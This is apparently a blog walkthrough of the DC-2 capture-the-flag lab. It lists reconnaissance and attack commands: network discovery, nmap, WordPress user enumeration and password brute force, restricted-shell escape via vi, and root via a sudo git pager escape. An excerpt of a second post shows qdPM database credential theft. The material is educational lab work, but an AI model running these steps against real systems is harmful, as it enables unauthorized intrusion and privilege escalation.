BUG REPORT

 

BUG REPORT

. # = means commands

. 1-6 = show my steps

1 netdiscover.

# netdiscover -r [192.168.159.133]

. netdiscover = find network traffic ips and mac address.

. -r = range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8




2 nmap

# nmap -p- [192.168.159.133] -sV

. -p- = bydefault all ports scan tcp ex: 65535

. -sV = Probe open ports to determine service/version info






3 wpscan.

# wpscan --url http://dc-2/ -e

. --url = target url scan

. -e = enumerate ex: username.








#wpscan --url http://dc-2/ -U /home/kali/usr -P /home/kali/pass.txt

. -U = usernames LIST

. -P password LIST






3 aceess.

# ssh tom@192.168.159.133 -p 7744

. access the tom users on port 7744.







4 change shell for this machine for the root access

# vi flag3.txt and :set shell=/bin/bash after that call the shell

5 To run all linux commands LIKE:- cat , cd , su , sudo etc.

# export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH

. export = this command add use for add variables.





4 how many command run with sudo check.

# sudo -l




5 how to access root.

# sudo git -p help config

. This invokes the default pager, which is likely to be less, other functions may apply.






6 after that you are access the final flag and your work complete.














Comments

Post a Comment

Popular posts from this blog

sql misconfiguration and privesc with path vulnerbility

Image
  sql misconfiguration and privesc with path vulnerability 1 nmap 10.10.134.21 -sV . -sV = Probe open ports to determine service/version info. 2 search ip in browser to show admin page. . qdPM 9.2 = show website version. 3 check version is exploitable or not. . version is exploitable. . check last line in exploit this link to install yml file link = http://<website>/core/config/databases.yml 4 Download yml file to see username name and password for mysql databse. 5 chek yml file. 6 enter mysql dabatse use username and password. # mysql -h 10.10.134.21 -u qdpmadmin -p . -h = host . -u = username. . -p = password 7 show mysql databses. # show databases; . to show all dabatbase in mysql. 8 go staff database and show tables. # use staff # show tables; . this colum to informatin about staff informatin 9 show user table data to information about usernames. # select * from user; . * = selcet all data. . To show all users. . and copy all user and make list for users. EX:- nano user.txt
Read more